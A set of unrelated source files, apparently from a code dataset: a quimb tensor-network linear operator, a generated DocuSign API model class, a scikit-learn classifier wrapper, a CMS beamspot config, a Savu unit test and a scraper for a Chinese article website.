:-O-O-O-O-O-O-O-O-O-O-O-O-: --+
: | | | | | | | | | | | | : |
:-H-H-H-H-H-H-H-H-H-H-H-H-: acting on --V
: | | | | | | | | | | | | : |
:-O-O-O-O-O-O-O-O-O-O-O-O-: --+
left_inds^ ^right_inds
Like :class:`~quimb.tensor.tensor_core.TNLinearOperator`, but performs a
structured contract from one end to the other than can handle very long
chains possibly more efficiently by contracting in blocks from one end.
Parameters
----------
tn : TensorNetwork
The tensor network to turn into a ``LinearOperator``.
left_inds : sequence of str
The left indicies.
right_inds : sequence of str
The right indicies.
start : int
Index of starting site.
stop : int
Index of stopping site (does not include this site).
ldims : tuple of int, optional
If known, the dimensions corresponding to ``left_inds``.
rdims : tuple of int, optional
If known, the dimensions corresponding to ``right_inds``.
See Also
--------
TNLinearOperator
"""
def __init__(self, tn, left_inds, right_inds, start, stop,
ldims=None, rdims=None, is_conj=False, is_trans=False):
self.tn = tn
self.start, self.stop = start, stop
if ldims is None or rdims is None:
ind_sizes = tn.ind_sizes()
ldims = tuple(ind_sizes[i] for i in left_inds)
rdims = tuple(ind_sizes[i] for i in right_inds)
self.left_inds, self.right_inds = left_inds, right_inds
self.ldims, ld = ldims, qu.prod(ldims)
self.rdims, rd = rdims, qu.prod(rdims)
self.tags = self.tn.tags
# conjugate inputs/ouputs rather all tensors if necessary
self.is_conj = is_conj
self.is_trans = is_trans
self._conj_linop = None
self._adjoint_linop = None
self._transpose_linop = None
super().__init__(dtype=self.tn.dtype, shape=(ld, rd))
def _matvec(self, vec):
in_data = reshape(vec, self.rdims)
if self.is_conj:
in_data = conj(in_data)
if self.is_trans:
i, f, s = self.start, self.stop, 1
else:
i, f, s = self.stop - 1, self.start - 1, -1
# add the vector to the right of the chain
tnc = self.tn | Tensor(in_data, self.right_inds, tags=['_VEC'])
tnc.view_like_(self.tn)
# tnc = self.tn.copy()
# tnc |= Tensor(in_data, self.right_inds, tags=['_VEC'])
# absorb it into the rightmost site
tnc ^= ['_VEC', self.tn.site_tag(i)]
# then do a structured contract along the whole chain
out_T = tnc ^ slice(i, f, s)
out_data = out_T.transpose_(*self.left_inds).data.ravel()
if self.is_conj:
out_data = conj(out_data)
return out_data
def _matmat(self, mat):
d = mat.shape[-1]
in_data = reshape(mat, (*self.rdims, d))
if self.is_conj:
in_data = conj(in_data)
if self.is_trans:
i, f, s = self.start, self.stop, 1
else:
i, f, s = self.stop - 1, self.start - 1, -1
# add the vector to the right of the chain
in_ix = (*self.right_inds, '_mat_ix')
tnc = self.tn | Tensor(in_data, inds=in_ix, tags=['_VEC'])
tnc.view_like_(self.tn)
# tnc = self.tn.copy()
# tnc |= Tensor(in_data, inds=in_ix, tags=['_VEC'])
# absorb it into the rightmost site
tnc ^= ['_VEC', self.tn.site_tag(i)]
# then do a structured contract along the whole chain
out_T = tnc ^ slice(i, f, s)
out_ix = (*self.left_inds, '_mat_ix')
out_data = reshape(out_T.transpose_(*out_ix).data, (-1, d))
if self.is_conj:
out_data = conj(out_data)
return out_data
def copy(self, conj=False, transpose=False):
if transpose:
inds = (self.right_inds, self.left_inds)
dims = (self.rdims, self.ldims)
is_trans = not self.is_trans
else:
inds = (self.left_inds, self.right_inds)
dims = (self.ldims, self.rdims)
is_trans = self.is_trans
if conj:
is_conj = not self.is_conj
else:
is_conj = self.is_conj
return TNLinearOperator1D(self.tn, *inds, self.start, self.stop, *dims,
is_conj=is_conj, is_trans=is_trans)
def conj(self):
if self._conj_linop is None:
self._conj_linop = self.copy(conj=True)
return self._conj_linop
def _transpose(self):
if self._transpose_linop is None:
self._transpose_linop = self.copy(transpose=True)
return self._transpose_linop
def _adjoint(self):
"""Hermitian conjugate of this TNLO.
"""
# cache the adjoint
if self._adjoint_linop is None:
self._adjoint_linop = self.copy(conj=True, transpose=True)
return self._adjoint_linop
def to_dense(self):
T = self.tn ^ slice(self.start, self.stop)
if self.is_conj:
T = T.conj()
return T.to_dense(self.left_inds, self.right_inds)
@property
def A(self):
return self.to_dense()
|
the-stack_0_1693 | # coding: utf-8
"""
DocuSign REST API
The DocuSign REST API provides you with a powerful, convenient, and simple Web services API for interacting with DocuSign. # noqa: E501
OpenAPI spec version: v2.1
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from docusign_esign.client.configuration import Configuration
class ReferralInformation(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'advertisement_id': 'str',
'enable_support': 'str',
'external_org_id': 'str',
'group_member_id': 'str',
'id_type': 'str',
'included_seats': 'str',
'industry': 'str',
'plan_start_month': 'str',
'promo_code': 'str',
'publisher_id': 'str',
'referral_code': 'str',
'referrer_name': 'str',
'sale_discount_amount': 'str',
'sale_discount_fixed_amount': 'str',
'sale_discount_percent': 'str',
'sale_discount_periods': 'str',
'sale_discount_seat_price_override': 'str',
'shopper_id': 'str'
}
attribute_map = {
'advertisement_id': 'advertisementId',
'enable_support': 'enableSupport',
'external_org_id': 'externalOrgId',
'group_member_id': 'groupMemberId',
'id_type': 'idType',
'included_seats': 'includedSeats',
'industry': 'industry',
'plan_start_month': 'planStartMonth',
'promo_code': 'promoCode',
'publisher_id': 'publisherId',
'referral_code': 'referralCode',
'referrer_name': 'referrerName',
'sale_discount_amount': 'saleDiscountAmount',
'sale_discount_fixed_amount': 'saleDiscountFixedAmount',
'sale_discount_percent': 'saleDiscountPercent',
'sale_discount_periods': 'saleDiscountPeriods',
'sale_discount_seat_price_override': 'saleDiscountSeatPriceOverride',
'shopper_id': 'shopperId'
}
def __init__(self, _configuration=None, **kwargs): # noqa: E501
"""ReferralInformation - a model defined in Swagger""" # noqa: E501
if _configuration is None:
_configuration = Configuration()
self._configuration = _configuration
self._advertisement_id = None
self._enable_support = None
self._external_org_id = None
self._group_member_id = None
self._id_type = None
self._included_seats = None
self._industry = None
self._plan_start_month = None
self._promo_code = None
self._publisher_id = None
self._referral_code = None
self._referrer_name = None
self._sale_discount_amount = None
self._sale_discount_fixed_amount = None
self._sale_discount_percent = None
self._sale_discount_periods = None
self._sale_discount_seat_price_override = None
self._shopper_id = None
self.discriminator = None
setattr(self, "_{}".format('advertisement_id'), kwargs.get('advertisement_id', None))
setattr(self, "_{}".format('enable_support'), kwargs.get('enable_support', None))
setattr(self, "_{}".format('external_org_id'), kwargs.get('external_org_id', None))
setattr(self, "_{}".format('group_member_id'), kwargs.get('group_member_id', None))
setattr(self, "_{}".format('id_type'), kwargs.get('id_type', None))
setattr(self, "_{}".format('included_seats'), kwargs.get('included_seats', None))
setattr(self, "_{}".format('industry'), kwargs.get('industry', None))
setattr(self, "_{}".format('plan_start_month'), kwargs.get('plan_start_month', None))
setattr(self, "_{}".format('promo_code'), kwargs.get('promo_code', None))
setattr(self, "_{}".format('publisher_id'), kwargs.get('publisher_id', None))
setattr(self, "_{}".format('referral_code'), kwargs.get('referral_code', None))
setattr(self, "_{}".format('referrer_name'), kwargs.get('referrer_name', None))
setattr(self, "_{}".format('sale_discount_amount'), kwargs.get('sale_discount_amount', None))
setattr(self, "_{}".format('sale_discount_fixed_amount'), kwargs.get('sale_discount_fixed_amount', None))
setattr(self, "_{}".format('sale_discount_percent'), kwargs.get('sale_discount_percent', None))
setattr(self, "_{}".format('sale_discount_periods'), kwargs.get('sale_discount_periods', None))
setattr(self, "_{}".format('sale_discount_seat_price_override'), kwargs.get('sale_discount_seat_price_override', None))
setattr(self, "_{}".format('shopper_id'), kwargs.get('shopper_id', None))
@property
def advertisement_id(self):
"""Gets the advertisement_id of this ReferralInformation. # noqa: E501
A complex type that contains the following information for entering referral and discount information. The following items are included in the referral information (all string content): enableSupport, includedSeats, saleDiscountPercent, saleDiscountAmount, saleDiscountFixedAmount, saleDiscountPeriods, saleDiscountSeatPriceOverride, planStartMonth, referralCode, referrerName, advertisementId, publisherId, shopperId, promoCode, groupMemberId, idType, and industry. ###### Note: saleDiscountPercent, saleDiscountAmount, saleDiscountFixedAmount, saleDiscountPeriods, and saleDiscountSeatPriceOverride are reserved for DoucSign use only. # noqa: E501
:return: The advertisement_id of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._advertisement_id
@advertisement_id.setter
def advertisement_id(self, advertisement_id):
"""Sets the advertisement_id of this ReferralInformation.
A complex type that contains the following information for entering referral and discount information. The following items are included in the referral information (all string content): enableSupport, includedSeats, saleDiscountPercent, saleDiscountAmount, saleDiscountFixedAmount, saleDiscountPeriods, saleDiscountSeatPriceOverride, planStartMonth, referralCode, referrerName, advertisementId, publisherId, shopperId, promoCode, groupMemberId, idType, and industry. ###### Note: saleDiscountPercent, saleDiscountAmount, saleDiscountFixedAmount, saleDiscountPeriods, and saleDiscountSeatPriceOverride are reserved for DoucSign use only. # noqa: E501
:param advertisement_id: The advertisement_id of this ReferralInformation. # noqa: E501
:type: str
"""
self._advertisement_id = advertisement_id
@property
def enable_support(self):
"""Gets the enable_support of this ReferralInformation. # noqa: E501
When set to **true**, then customer support is provided as part of the account plan. # noqa: E501
:return: The enable_support of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._enable_support
@enable_support.setter
def enable_support(self, enable_support):
"""Sets the enable_support of this ReferralInformation.
When set to **true**, then customer support is provided as part of the account plan. # noqa: E501
:param enable_support: The enable_support of this ReferralInformation. # noqa: E501
:type: str
"""
self._enable_support = enable_support
@property
def external_org_id(self):
"""Gets the external_org_id of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The external_org_id of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._external_org_id
@external_org_id.setter
def external_org_id(self, external_org_id):
"""Sets the external_org_id of this ReferralInformation.
# noqa: E501
:param external_org_id: The external_org_id of this ReferralInformation. # noqa: E501
:type: str
"""
self._external_org_id = external_org_id
@property
def group_member_id(self):
"""Gets the group_member_id of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The group_member_id of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._group_member_id
@group_member_id.setter
def group_member_id(self, group_member_id):
"""Sets the group_member_id of this ReferralInformation.
# noqa: E501
:param group_member_id: The group_member_id of this ReferralInformation. # noqa: E501
:type: str
"""
self._group_member_id = group_member_id
@property
def id_type(self):
"""Gets the id_type of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The id_type of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._id_type
@id_type.setter
def id_type(self, id_type):
"""Sets the id_type of this ReferralInformation.
# noqa: E501
:param id_type: The id_type of this ReferralInformation. # noqa: E501
:type: str
"""
self._id_type = id_type
@property
def included_seats(self):
"""Gets the included_seats of this ReferralInformation. # noqa: E501
The number of seats (users) included. # noqa: E501
:return: The included_seats of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._included_seats
@included_seats.setter
def included_seats(self, included_seats):
"""Sets the included_seats of this ReferralInformation.
The number of seats (users) included. # noqa: E501
:param included_seats: The included_seats of this ReferralInformation. # noqa: E501
:type: str
"""
self._included_seats = included_seats
@property
def industry(self):
"""Gets the industry of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The industry of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._industry
@industry.setter
def industry(self, industry):
"""Sets the industry of this ReferralInformation.
# noqa: E501
:param industry: The industry of this ReferralInformation. # noqa: E501
:type: str
"""
self._industry = industry
@property
def plan_start_month(self):
"""Gets the plan_start_month of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The plan_start_month of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._plan_start_month
@plan_start_month.setter
def plan_start_month(self, plan_start_month):
"""Sets the plan_start_month of this ReferralInformation.
# noqa: E501
:param plan_start_month: The plan_start_month of this ReferralInformation. # noqa: E501
:type: str
"""
self._plan_start_month = plan_start_month
@property
def promo_code(self):
"""Gets the promo_code of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The promo_code of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._promo_code
@promo_code.setter
def promo_code(self, promo_code):
"""Sets the promo_code of this ReferralInformation.
# noqa: E501
:param promo_code: The promo_code of this ReferralInformation. # noqa: E501
:type: str
"""
self._promo_code = promo_code
@property
def publisher_id(self):
"""Gets the publisher_id of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The publisher_id of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._publisher_id
@publisher_id.setter
def publisher_id(self, publisher_id):
"""Sets the publisher_id of this ReferralInformation.
# noqa: E501
:param publisher_id: The publisher_id of this ReferralInformation. # noqa: E501
:type: str
"""
self._publisher_id = publisher_id
@property
def referral_code(self):
"""Gets the referral_code of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The referral_code of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._referral_code
@referral_code.setter
def referral_code(self, referral_code):
"""Sets the referral_code of this ReferralInformation.
# noqa: E501
:param referral_code: The referral_code of this ReferralInformation. # noqa: E501
:type: str
"""
self._referral_code = referral_code
@property
def referrer_name(self):
"""Gets the referrer_name of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The referrer_name of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._referrer_name
@referrer_name.setter
def referrer_name(self, referrer_name):
"""Sets the referrer_name of this ReferralInformation.
# noqa: E501
:param referrer_name: The referrer_name of this ReferralInformation. # noqa: E501
:type: str
"""
self._referrer_name = referrer_name
@property
def sale_discount_amount(self):
"""Gets the sale_discount_amount of this ReferralInformation. # noqa: E501
Reserved for DocuSign use only. # noqa: E501
:return: The sale_discount_amount of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._sale_discount_amount
@sale_discount_amount.setter
def sale_discount_amount(self, sale_discount_amount):
"""Sets the sale_discount_amount of this ReferralInformation.
Reserved for DocuSign use only. # noqa: E501
:param sale_discount_amount: The sale_discount_amount of this ReferralInformation. # noqa: E501
:type: str
"""
self._sale_discount_amount = sale_discount_amount
@property
def sale_discount_fixed_amount(self):
"""Gets the sale_discount_fixed_amount of this ReferralInformation. # noqa: E501
Reserved for DocuSign use only. # noqa: E501
:return: The sale_discount_fixed_amount of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._sale_discount_fixed_amount
@sale_discount_fixed_amount.setter
def sale_discount_fixed_amount(self, sale_discount_fixed_amount):
"""Sets the sale_discount_fixed_amount of this ReferralInformation.
Reserved for DocuSign use only. # noqa: E501
:param sale_discount_fixed_amount: The sale_discount_fixed_amount of this ReferralInformation. # noqa: E501
:type: str
"""
self._sale_discount_fixed_amount = sale_discount_fixed_amount
@property
def sale_discount_percent(self):
"""Gets the sale_discount_percent of this ReferralInformation. # noqa: E501
Reserved for DocuSign use only. # noqa: E501
:return: The sale_discount_percent of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._sale_discount_percent
@sale_discount_percent.setter
def sale_discount_percent(self, sale_discount_percent):
"""Sets the sale_discount_percent of this ReferralInformation.
Reserved for DocuSign use only. # noqa: E501
:param sale_discount_percent: The sale_discount_percent of this ReferralInformation. # noqa: E501
:type: str
"""
self._sale_discount_percent = sale_discount_percent
@property
def sale_discount_periods(self):
"""Gets the sale_discount_periods of this ReferralInformation. # noqa: E501
Reserved for DocuSign use only. # noqa: E501
:return: The sale_discount_periods of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._sale_discount_periods
@sale_discount_periods.setter
def sale_discount_periods(self, sale_discount_periods):
"""Sets the sale_discount_periods of this ReferralInformation.
Reserved for DocuSign use only. # noqa: E501
:param sale_discount_periods: The sale_discount_periods of this ReferralInformation. # noqa: E501
:type: str
"""
self._sale_discount_periods = sale_discount_periods
@property
def sale_discount_seat_price_override(self):
"""Gets the sale_discount_seat_price_override of this ReferralInformation. # noqa: E501
Reserved for DocuSign use only. # noqa: E501
:return: The sale_discount_seat_price_override of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._sale_discount_seat_price_override
@sale_discount_seat_price_override.setter
def sale_discount_seat_price_override(self, sale_discount_seat_price_override):
"""Sets the sale_discount_seat_price_override of this ReferralInformation.
Reserved for DocuSign use only. # noqa: E501
:param sale_discount_seat_price_override: The sale_discount_seat_price_override of this ReferralInformation. # noqa: E501
:type: str
"""
self._sale_discount_seat_price_override = sale_discount_seat_price_override
@property
def shopper_id(self):
"""Gets the shopper_id of this ReferralInformation. # noqa: E501
# noqa: E501
:return: The shopper_id of this ReferralInformation. # noqa: E501
:rtype: str
"""
return self._shopper_id
@shopper_id.setter
def shopper_id(self, shopper_id):
"""Sets the shopper_id of this ReferralInformation.
# noqa: E501
:param shopper_id: The shopper_id of this ReferralInformation. # noqa: E501
:type: str
"""
self._shopper_id = shopper_id
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ReferralInformation, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ReferralInformation):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, ReferralInformation):
return True
return self.to_dict() != other.to_dict()
|
the-stack_0_1695 | #!/usr/bin/env python
from sklearn import svm
import numpy as np
from sklearn.externals import joblib
from sklearn import linear_model
import classifier.msg as msg
import os
SINGLE = 0
MULTIPLE = 1
def ini(path=None):
'''initialization
Args:
Returns:
'''
global clf
clf = linear_model.LogisticRegression(class_weight='balanced') #LR
if path is not None:
if os.path.exists(path):
clf = joblib.load(path)
msg.timemsg('Loaded classifier from: {}'.format(path))
else:
msg.timemsg('Path to classifier does not exist: {}'.format(path))
# SVM
#clf = svm.SVC(kernel='linear', C = 1.0) # SVM
def train(features, labels, path='clf.pkl'):
'''train classifier
Args:
features (list): Features
labels (list): Labels
Returns:
'''
global clf
msg.timemsg("train_shape: {}".format(features.shape))
msg.timemsg('Start training')
clf.fit(features, labels)
msg.timemsg('Finished training')
try:
joblib.dump(clf, path)
msg.timemsg('Dumped classifier')
except:
msg.timemsg('Failed to dump classifier!')
def predict(X, mode):
'''Prediction
Args:
Returns:
prediction (list)
'''
global clf
if (mode == MULTIPLE): # many features
#msg.timemsg("predict_shape: {}".format(X.shape))
return clf.predict(X)
if (mode == SINGLE):
return np.squeeze(np.array(clf.predict(X.reshape(1,-1)))) # convert to array, one dimension too much, remove it
def save (folder):
'''Save
Args:
folder
Returns:
.pkl
'''
global clf
joblib.dump(clf, folder)
def load (folder):
'''Save
Args:
folder
Returns:
.pkl
'''
global clf
clf = joblib.load(folder)
|
the-stack_0_1698 | import FWCore.ParameterSet.Config as cms
process = cms.Process("write2DB")
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.load("CondCore.CondDB.CondDB_cfi")
#################################
# Produce a SQLITE FILE
process.CondDB.connect = "SQLITEFILE"
#################################
process.PoolDBOutputService = cms.Service("PoolDBOutputService",
process.CondDB,
toPut = cms.VPSet(cms.PSet(record = cms.string('BeamSpotObjectsRcd'),
tag = cms.string('TAGNAME')
)
),
timetype = cms.untracked.string('TIMETYPE'),
loadBlobStreamer = cms.untracked.bool(False)
)
process.source = cms.Source("EmptySource")
process.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(1))
process.beamspot = cms.EDAnalyzer("BeamSpotWrite2DB",
OutputFileName = cms.untracked.string('BEAMSPOTFILE')
)
process.p = cms.Path(process.beamspot)
# done.
|
the-stack_0_1700 | # Copyright 2014 Diamond Light Source Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. module:: camera_rot_corr_test
:platform: Unix
:synopsis: Test for the camera_rot_correction plugin
.. moduleauthor:: Mark Basham <[email protected]>
"""
import unittest
from savu.test import test_utils as tu
from savu.test.travis.framework_tests.plugin_runner_test import \
run_protected_plugin_runner
class CameraRotCorrTest(unittest.TestCase):
global data_file, experiment
data_file = '24737.nxs'
experiment = None
def test_correction(self):
process_list = 'corrections/camera_rot_corr_test.nxs'
options = tu.initialise_options(data_file, experiment, process_list)
run_protected_plugin_runner(options)
tu.cleanup(options)
if __name__ == "__main__":
unittest.main()
|
the-stack_0_1701 | import requests
import re
from bs4 import BeautifulSoup
import traceback
import json
def get_html_text(url):
try:
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36',
}
r = requests.get(url, headers=headers)
r.raise_for_status()
r.encoding = 'utf-8'
return r.text
except:
return 200
# traceback.print_exc()
def get_nav_addr(lst, web_url):
url = get_html_text(web_url + '/html/wenmimap.html')
soup = BeautifulSoup(url, "html.parser")
link_list = soup.find_all('div', attrs={'class': 'list'})
# print(link_list)
# print(link_list[0])
# print(type(link_list[0]))
# 获取map中导航的所有链接
for list in link_list:
ul_list = list.find('ul')
# print(ul_list)
a = ul_list.find_all('a')
for i in a:
try:
href = i.attrs['href']
lst.append(href)
except:
traceback.print_exc()
def get_article_url(lst, web_url, path):
fw = open(path, 'a', encoding='utf-8')
nav_count = 0
# 获取每个文章的链接
for nav_link in lst:
article_count = 0
print(nav_link)
max_list = 0
min_list = 0
url = get_html_text(web_url + nav_link)
soup = BeautifulSoup(url, "html.parser")
page = soup.find('h3', attrs={'class': 'list_page'})
# print(page)
# 判断是否该页面有内容
if page is None:
continue
min_page = page.find_all('a', string="首页")
max_page = page.find_all('a', string="尾页")
min_num = re.search(r'\d{1,4}', str(min_page[0]))
max_num = re.search(r'\d{1,4}', str(max_page[0]))
# 当只有一页的时候, 有可能链接为 /index.html, 因此没有想要的页码
if min_num:
min_num1 = int(min_num.group(0))
else:
min_num1 = 1
if max_num:
max_num1 = int(max_num.group(0))
else:
max_num1 = 1
# 获取最大的页数, 开始遍历每一页中的文章内容
num = int(max(min_num1, max_num1))
try:
for i in range(num):
r = get_html_text(web_url + nav_link + 'List_' + str(i + 1) + '.html')
# url = web_url + nav_link + 'List_' + str(i + 1) + '.html'
# 将"http://www.cnwmz.com/html/jiguandanwei_tag/gongqingtuan/List_27.html"等等写入文本
# fw.write(json.dumps(url, ensure_ascii=False) + '\n')
soup = BeautifulSoup(r, "html.parser")
# 直接获取<dt>标签中的内容
# article = soup.find("article", attrs={'id': 'list_l'})
article = soup.find_all('dt', soup)
for article_list in article:
a = article_list.find('a')
href = a.attrs['href']
article_url = web_url + href
# print(article_url)
article_count += 1
fw.write(json.dumps(article_url, ensure_ascii=False) + '\n')
# print(href)
# lst.append(href)
nav_count += 1
print(article_count)
except:
traceback.print_exc()
print(nav_count)
def get_news_content(lst, web_url, fpath, fcontent):
info_dict = {'url': '', 'title': '', 'content': '', 'class': '', 'tag': []}
fw = open(fcontent, 'a', encoding='utf-8')
with open(fpath, 'r') as fr:
for i, line in enumerate(fr):
# print(i)
url = re.search(r'http.+\.html', line).group(0)
print(url)
try:
r = get_html_text(url)
# 将url存入dict
info_dict['url'] = url
soup = BeautifulSoup(r, 'html.parser')
nav = soup.find('nav')
nav_a = nav.find_all('a')
nav_con = '您现位置:'
for nav_content in nav_a:
# print(nav_content.string)
nav_con += nav_content.string + '>'
# print(nav_con + '>正文')
# 导航存入dict
info_dict['class'] = nav_con + '>正文'
# print(nav)
article = soup.find('article', attrs={'id': 'con_l'})
# print(article)
title = article.find('h1')
# print(title.string)
# 标题存入dict
info_dict['title'] = str(title.string)
section_tip = article.find('section', attrs={'id': 'tip'})
tip = section_tip.find('h2')
tag = tip.find_all('a')
tag_con = []
for t in tag:
tag_con.append(t.string)
# 标签存到dict
info_dict['tag'] = tag_con
# 开始获取文章的内容
# 文章有可能有多页, 因此需要爬取多个页面的内容
web_url = re.search(r'http://www.cnwmz.com/html/\d+/\d+', line)
content = ''
con = ['']
for j in range(30):
# 尝试文章是否有多页, 若有多页的话, 则改变j的值进行内容添加
if j != 0:
j += 1
wu = str(web_url.group(0)) + '_' + str(j) + '.html'
wu_text = get_html_text(wu)
if wu_text == 200:
break
soup = BeautifulSoup(wu_text, 'html.parser')
article_content = soup.find('section', attrs={'id': 'article'})
art_p = article_content.find_all('p')
print(len(art_p))
if len(art_p) < 2:
for ac in article_content:
name = str(ac.name)
if name == 'br':
content += '\n'
if str(ac.string) == 'None' or str(ac.string) == 'wm("arc");':
continue
# print(ac.string)
content += str(ac.string)
# print(content)
# con[0] = content
else:
article1 = soup.find('article', attrs={'id': 'con_l'})
art = article1.find_all('p')
# print(art)
for j, a in enumerate(art):
# if a.attrs['class'] == 'page_css':
# continue
# print(art[j])
# print(type(art[j]))
# if art[j].find('class', attrs={'class': 'page_css'}):
# print(1)
# continue
m = art[j].find('a')
if art[j].find('a'):
if str(art[j].find('a').string) == '上一页':
continue
# print(a.contents)
for m in a.contents:
content += str(m.string)
# print(m)
# print(content)
content += '\n'
# con[0] = content
# print(content)
# 文章内容存入dict
info_dict['content'] = content
fw.write(json.dumps(info_dict, ensure_ascii=False) + '\n')
except:
traceback.print_exc()
if i == 0:
break
# print(info_dict)
fr.close()
fw.close()
def main():
web_url = 'http://www.cnwmz.com'
lst = []
fpath = 'F://wmz/wmz.json'
flist_url = 'F://wmz/article_url2.txt'
fcontent = "F://wmz/article_info_test.txt"
# 获取文秘站所有导航的页码链接
# get_nav_addr(lst, web_url)
# 获取文秘站的所有文章链接
# get_article_url(lst, web_url, flist_url)
# 获取想要的内容
get_news_content(lst, web_url, flist_url, fcontent)
if __name__ == '__main__':
main()
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.